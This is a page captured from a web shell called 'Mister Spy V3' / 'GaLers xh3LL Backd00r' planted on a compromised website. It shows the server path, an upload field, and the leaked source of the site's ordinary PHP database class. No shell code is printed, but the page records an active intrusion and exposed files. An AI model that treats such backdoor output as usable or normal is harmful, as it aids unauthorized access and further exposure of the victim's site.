Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/web/library/
Upload File :
Current File : /home/caballoscriollos/www/web/library/class.edicioneslibres.php

<?php 

require_once('class.dbaccess.php');
require_once('class.edicionlibre.php');
require_once('class.filter.php');
require_once('class.page.php');

class EdicionesLibres extends DBAccess
{
	public function GetAll(Page $oPage = NULL)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblEdicionesLibre";
		$sql.= " ORDER BY IdEdicion";
		$sql.= ($oPage) ? Pageable::ParsePage($oPage) : "";
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		$arr = array();
			
		while ($oRow = $oRes->GetRow())	
		{	
			$oEdicionLibre = new EdicionLibre();
			$oEdicionLibre->ParseFromArray($oRow);
			
			array_push($arr, $oEdicionLibre);
			
			$oRes->MoveNext();
		}	
		
		return $arr;		
	}
	

	public function GetById($IdEdicion)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblEdicionesLibre";
		$sql.= " WHERE IdEdicion = " . DB::Number($IdEdicion);
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oEdicionLibre = new EdicionLibre();
		$oEdicionLibre->ParseFromArray($oRow);
		
		return $oEdicionLibre;		
	}
	
	
	public function GetCountRows()
	{
		$sql = "SELECT *";
		$sql.= " FROM tblEdicionesLibre";
		$sql.= " ORDER BY IdEdicion";

		if (!($oRes = $this->GetQuery($sql)))
			return false;
		
		$CountRows = $oRes->NumRows();
		
		return $CountRows;
	}
	
	
	public function Create(EdicionLibre $oEdicionLibre)
	{
		$arr = array
		(
			'IdEdicion' => DB::Number($oEdicionLibre->IdEdicion),
			'Imagen' 	=> DB::String($oEdicionLibre->Imagen)
		);

		if (!$this->Insert('tblEdicionesLibre', $arr))
			return false;

		return $oEdicionLibre;
	}
	
	
	public function Update(EdicionLibre $oEdicionLibre)
	{
		$where = " IdEdicion = " . DB::Number($oEdicionLibre->IdEdicion);
		
		$arr = array('Imagen' => DB::String($oEdicionLibre->Imagen));
		
		if (!DBAccess::UpdateEntidad('tblEdicionesLibre', $arr, $where))
			return false;
		
		return $oEdicionLibre;
	}
	

	public function Delete($IdEdicion)
	{
		$where = " IdEdicion = " . DB::Number($IdEdicion);

		if (!DBAccess::DeleteEntidad('tblEdicionesLibre', $where))
			return false;

		return true;	
	}		
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat